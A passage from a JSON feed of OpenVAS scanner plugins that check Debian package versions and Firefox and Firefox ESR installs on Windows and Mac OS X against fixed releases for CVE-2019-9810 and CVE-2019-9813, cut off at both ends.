isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"60.6.1esr-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814940", "type": "openvas", "title": "Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814940\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:55:58 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox Security Updates(mfsa_2019-09_2019-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 66.0.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 66.0.1\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"66.0.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"66.0.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:46:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310814947", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814947", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-MAC OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814947\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 11:36:36 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2019-09_2019-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox ESR\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - IonMonkey MArraySlice has incorrect alias information and\n\n - Ionmonkey type confusion with __proto__ mutations..\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 60.6.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"60.6.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"60.6.1\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T19:25:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-03-25T00:00:00", "id": "OPENVAS:1361412562310891727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891727", "type": "openvas", "title": "Debian LTS: Security Advisory for firefox-esr (DLA-1727-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891727\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-25 23:00:00 +0100 (Mon, 25 Mar 2019)\");\n script_name(\"Debian LTS: Security Advisory for firefox-esr (DLA-1727-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 